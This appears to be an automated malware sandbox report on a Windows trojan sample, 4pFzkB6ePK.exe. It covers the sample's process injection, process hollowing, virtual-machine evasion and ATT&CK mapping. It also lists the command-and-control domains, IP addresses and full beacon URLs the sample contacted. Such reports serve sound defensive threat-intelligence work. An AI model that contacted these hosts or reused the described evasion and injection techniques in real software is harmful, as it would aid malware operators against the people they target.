              Source: Yara matchFile source: 00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.284397721.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.470152812.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.472397377.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.472184819.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.228140943.0000000003659000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.4pFzkB6ePK.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.4pFzkB6ePK.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.4pFzkB6ePK.exe.37dcbc0.2.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Process Injection612Masquerading1Input Capture1Security Software Discovery331Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsShared Modules1Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion14LSASS MemoryVirtualization/Sandbox Evasion14Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 356512 Sample: 4pFzkB6ePK.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 32 www.trinityhousegoa.com 2->32 34 www.2seamapparel.com 2->34 36 3 other IPs or domains 2->36 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 8 other signatures 2->52 11 4pFzkB6ePK.exe 3 2->11         started        signatures3 process4 file5 30 C:\Users\user\AppData\...\4pFzkB6ePK.exe.log, ASCII 11->30 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 11->62 64 Tries to detect virtualization through RDTSC time measurements 11->64 66 Injects a PE file into a foreign processes 11->66 15 4pFzkB6ePK.exe 11->15         started        signatures6 process7 signatures8 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 74 Queues an APC in another process (thread injection) 15->74 18 explorer.exe 15->18 injected process9 dnsIp10 38 www.ntljcb.com 154.201.205.155, 49738, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 18->38 40 www.nachbau.net 95.130.17.35, 49725, 80 INETWIRE-ASWilhelm-Wagenfeld-Str16DE Germany 18->40 42 6 other IPs or domains 18->42 54 System process connects to network (likely due to code injection or exploit) 18->54 22 msiexec.exe 12 18->22         started        signatures11 process12 dnsIp13 44 www.fsqlgt.com 22->44 56 Modifies the context of a thread in another process (thread injection) 22->56 58 Maps a DLL or memory area into another process 22->58 60 Tries to detect virtualization through RDTSC time measurements 22->60 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              4pFzkB6ePK.exe23%VirustotalBrowse
              4pFzkB6ePK.exe28%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              4pFzkB6ePK.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              5.2.4pFzkB6ePK.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

              Domains

              SourceDetectionScannerLabelLink
              trinityhousegoa.com1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.nachbau.net/tub0/?0T0hlT=cydGkSUU+hbxwnLMCHdxs2HTbhyeOBhf6VDIiN7OyAb+9b2I/6QPcL+NYbrcHhStME+j&OVlT0R=o2JlVT4hT8qhr8ep0%Avira URL Cloudsafe
              www.ntljcb.com/tub0/0%Avira URL Cloudsafe
              http://www.fsqlgt.com/0%Avira URL Cloudsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.fsqlgt.com/tub0/?0T0hlT=nrDRCNaQ3GMZq2PvHSeNd5wOe0%Avira URL Cloudsafe
              http://www.carbon-foam.com/tub0/?0T0hlT=0g3BJlW7sTphQ/5j4Tdr5dYYoDFSx+aDomq4rDoP20bT0mosHTIKHGclLGRJ8AP1BBBd&OVlT0R=o2JlVT4hT8qhr8ep0%Avira URL Cloudsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.fsqlgt.com/T0hlT=nrDRCNaQ3GMZq2PvHSeNd5wOe0%Avira URL Cloudsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.aslanforklift.com/tub0/?0T0hlT=Oc9Sv6ZsHiz1lEkHjT4sUkzXc6kK6TfJoTMn/p3mX09SqIZJtOPjrYy4Z3tQQ5aTicNK&OVlT0R=o2JlVT4hT8qhr8ep0%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.ntljcb.com/tub0/?0T0hlT=dN2zk3vDrvOSMWpoBKxdiHLfh4G+CBzvqQ9gZV3x5lRoIc3e6NmSOgfKn1bO4v69I6lv&OVlT0R=o2JlVT4hT8qhr8ep0%Avira URL Cloudsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.fsqlgt.com
              106.13.210.52
              truetrue
                unknown
                www.ntljcb.com
                154.201.205.155
                truetrue
                  unknown
                  www.nachbau.net
                  95.130.17.35
                  truetrue
                    unknown
                    trinityhousegoa.com
                    194.59.164.91
                    truetrueunknown
                    aslanforklift.com
                    160.153.128.38
                    truetrue
                      unknown
                      shops.myshopify.com
                      23.227.38.74
                      truefalse
                        unknown
                        carbon-foam.com
                        184.168.131.241
                        truetrue
                          unknown
                          www.electricbiketechnologes.com
                          unknown
                          unknowntrue
                            unknown
                            www.carbon-foam.com
                            unknown
                            unknowntrue
                              unknown
                              www.trinityhousegoa.com
                              unknown
                              unknowntrue
                                unknown
                                www.2seamapparel.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.aslanforklift.com
                                  unknown
                                  unknowntrue
                                    unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.nachbau.net/tub0/?0T0hlT=cydGkSUU+hbxwnLMCHdxs2HTbhyeOBhf6VDIiN7OyAb+9b2I/6QPcL+NYbrcHhStME+j&OVlT0R=o2JlVT4hT8qhr8eptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    www.ntljcb.com/tub0/true
                                    • Avira URL Cloud: safe
                                    low
                                    http://www.carbon-foam.com/tub0/?0T0hlT=0g3BJlW7sTphQ/5j4Tdr5dYYoDFSx+aDomq4rDoP20bT0mosHTIKHGclLGRJ8AP1BBBd&OVlT0R=o2JlVT4hT8qhr8eptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.aslanforklift.com/tub0/?0T0hlT=Oc9Sv6ZsHiz1lEkHjT4sUkzXc6kK6TfJoTMn/p3mX09SqIZJtOPjrYy4Z3tQQ5aTicNK&OVlT0R=o2JlVT4hT8qhr8eptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.ntljcb.com/tub0/?0T0hlT=dN2zk3vDrvOSMWpoBKxdiHLfh4G+CBzvqQ9gZV3x5lRoIc3e6NmSOgfKn1bO4v69I6lv&OVlT0R=o2JlVT4hT8qhr8eptrue
                                    • Avira URL Cloud: safe
                                    unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.apache.org/licenses/LICENSE-2.04pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.com4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designersG4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers/?4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/bThe4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers?4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fsqlgt.com/msiexec.exe, 0000000B.00000002.474927487.0000000003244000.00000004.00000020.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.tiro.comexplorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fsqlgt.com/tub0/?0T0hlT=nrDRCNaQ3GMZq2PvHSeNd5wOemsiexec.exe, 0000000B.00000002.474927487.0000000003244000.00000004.00000020.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.goodfont.co.kr4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css4pFzkB6ePK.exe, 00000002.00000002.227758190.0000000002651000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.fsqlgt.com/T0hlT=nrDRCNaQ3GMZq2PvHSeNd5wOemsiexec.exe, 0000000B.00000002.474927487.0000000003244000.00000004.00000020.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.carterandcone.coml4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.sajatypeworks.com4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.typography.netD4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlN4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn/cThe4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.galapagosdesign.com/staff/dennis.htm4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fontfabrik.com4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.founder.com.cn/cn4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/frere-jones.html4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.jiyu-kobo.co.jp/4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.galapagosdesign.com/DPlease4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers84pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.fonts.com4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.sandoll.co.kr4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.urwpp.deDPlease4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.zhongyicts.com.cn4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.sakkal.com4pFzkB6ePK.exe, 00000002.00000002.231090586.0000000005680000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.253631416.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          154.201.205.155
                                                          unknownSeychelles
                                                          132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                          160.153.128.38
                                                          unknownUnited States
                                                          21501GODADDY-AMSDEtrue
                                                          184.168.131.241
                                                          unknownUnited States
                                                          26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                          95.130.17.35
                                                          unknownGermany
                                                          13246INETWIRE-ASWilhelm-Wagenfeld-Str16DEtrue
                                                          106.13.210.52
                                                          unknownChina
                                                          38365BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdtrue

                                                          General Information

                                                          Joe Sandbox Version:31.0.0 Emerald
                                                          Analysis ID:356512
                                                          Start date:23.02.2021
                                                          Start time:09:13:02
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 43s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:4pFzkB6ePK.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:30
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@7/1@9/5
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 17.3% (good quality ratio 15.3%)
                                                          • Quality average: 72.5%
                                                          • Quality standard deviation: 32.6%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 52.255.188.83, 92.122.145.220, 104.42.151.234, 104.43.193.48, 40.88.32.150, 23.210.252.85, 51.104.144.132, 8.248.121.254, 8.248.147.254, 67.26.81.254, 8.248.119.254, 67.26.73.254, 92.122.213.194, 92.122.213.247, 20.54.26.129, 51.11.168.160
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          09:13:59API Interceptor2x Sleep call for process: 4pFzkB6ePK.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          154.201.205.155NewOrder.xlsmGet hashmaliciousBrowse
                                                          • www.ntljcb.com/tub0/?azuxWju=dN2zk3vGroOWMGlkDKxdiHLfh4G+CBzvqQlwFWrw9FRpItbY9d3eYknIkQ3Y8/+OD54fXA==&0dt=YtdhwPcHS
                                                          160.153.128.38https://altgoldlaw-my.sharepoint.com/:o:/p/jmgesq/Ep9lZrrzDElGtO3lN1UvpRwBwNpxfjMuE1iYrdWxe9al6w?e=ssVCpyGet hashmaliciousBrowse
                                                            184.168.131.241NewOrder.xlsmGet hashmaliciousBrowse
                                                            • www.carbon-foam.com/tub0/?azuxWju=0g3BJlW+sUplQv1v6Tdr5dYYoDFSx+aDomyo3A0OyUbS0XEqADZGRCknIj9f4QLGKCctRg==&0dt=YtdhwPcHS
                                                            PO_210222.exeGet hashmaliciousBrowse
                                                            • www.austinrealestateinformation.com/dka/?9rYD4D2P=R3IXbz033aNgxGxgeKHoFpWL/KL9ZZd1WRwPwWEAOhD4PYW/NSvEgSmD7c/SRxvMLwCh&4h=vTxdADNprBU8ur
                                                            IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                            • www.finishmybasemint.com/mt6e/?mrj8Pz0x=8q8s+GsTymN5iX5QANhp5JsYuAJfRyvrnxuieYo3aLrfnY7eZyKWs/7iTj+R+WKp3q9aYQ==&8pXxsd=pFN4nj8XVNlXNFt
                                                            IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                            • www.330ballymorecir.com/gypo/?UrjPuprX=a3w+6Gsrsd7Xqv4aHpadI1wjv83Mry/2u8ll5SA1AtQ4ICUXaMWsQCE6gmdmU65DwT8pag==&nnLx=UBZp3XKPefjxdB
                                                            PDF.exeGet hashmaliciousBrowse
                                                            • www.elevatefeelgreat.com/ujg4/?Ktz4q=a+1D/qRDwQc5Ok84Vv16Q0CP7ouU0zm6ILYQgA1THVPgaX/TjCvIDUjp+96Gy6LgFSMs&tTrL=ApdhXrS
                                                            SOA.exeGet hashmaliciousBrowse
                                                            • www.retrospectphotographydesign.com/thg/?AjR=lpgWntKb9HDujHJVvIcwk3nOAKT9rs+ln54V4rtsDg34y+wU/SYl15cOSr+WYLwu05i/&ndndzN=KdvhIX708JD4
                                                            YSZiV5Oh2E.exeGet hashmaliciousBrowse
                                                            • www.magnabeautystyle.com/bw82/?-Zw=9KGhaNjlEHjKuyDrEmkWJtXE2Tv4ryq1r5QMepFpp8kzUlSLxW8I9AyFK0RMrDHX0GRB&2db=X48HMfxHw
                                                            Confirmation.exeGet hashmaliciousBrowse
                                                            • www.1031exchangeintoreit.com/rhg/?FR0XzD=d3dqzBXGFJvEGELRXcxi+A0awvSN8itAIhv7LASPf1Zjn/YhIQxwttdyml7uDGXmjV/ehbJLvQ==&KXuxZ=klnTV8lX84Gh9lW0
                                                            Purchase order.exeGet hashmaliciousBrowse
                                                            • www.thecleanstones.com/u3q/?rL=d87h72D0cTT&CRi=fyfYO86Xlk8m8eftf+q7yCyqKY7rb7mYh41QpNjrHWJNhDF7vjskJ414CYS4yOHmLuh7
                                                            Request For Quotation.PDF.exeGet hashmaliciousBrowse
                                                            • www.misbackupemails.com/oze/?RZ=dnr4XbdP2xmpz2-&Tj=4KLHQ8bCAkPSSR2A3rNWtiBHO4v+sIUcQEpNBkxyRlps9XuV3EwQAen3RH25596IevZb
                                                            IMG_7189012.exeGet hashmaliciousBrowse
                                                            • www.finishmybasemint.com/mt6e/?DVBl=8q8s+GsWyhN9iH1cCNhp5JsYuAJfRyvrnx2yCb02errenpXYeiba67DgQFyX1neiiMJt&T8SH=pFNpKT28jFN454KP
                                                            DHL Shipment Notification 7465649870,pdf.exeGet hashmaliciousBrowse
                                                            • www.resellerpagecomputers.com/cna8/?DzrLH=VBZHY83XQx6heP&EZA0IN=shDnAgmAQpw1MT9A2UTmOqUaO6S+siwCiYdWyjAfFJP2nxDvh6NVXNIpX3zKlW+mKTQu
                                                            urgent specification request.exeGet hashmaliciousBrowse
                                                            • www.brittanyspaparazziboutique.com/2bg/?U8PL=ofwSNKbvuHcvgJESE5WeF8T+6gqYa75IzwxUH17FePZ7Ftfsk5/DaILJkXJ9GYuASIIn&RfutZJ=0V0hlT
                                                            Shinshin Machinery.exeGet hashmaliciousBrowse
                                                            • www.onpassivewithval.com/gbr/?EHO8qf=NJEx_TihIRV&Jt7=MhGZF0+gx7ZAswUcx3UNSfXmO75wg/U1yZmfOyJeCMmmZRa4y3wAVyXzfEa+JPoM4R3l
                                                            CMahQwuvAE.exeGet hashmaliciousBrowse
                                                            • www.magnabeautystyle.com/bw82/?CneDg=9KGhaNjlEHjKuyDrEmkWJtXE2Tv4ryq1r5QMepFpp8kzUlSLxW8I9AyFK3x27SnvuhwG&Dxlpd=2dmp
                                                            ForeignRemittance_20210219_USD.xlsxGet hashmaliciousBrowse
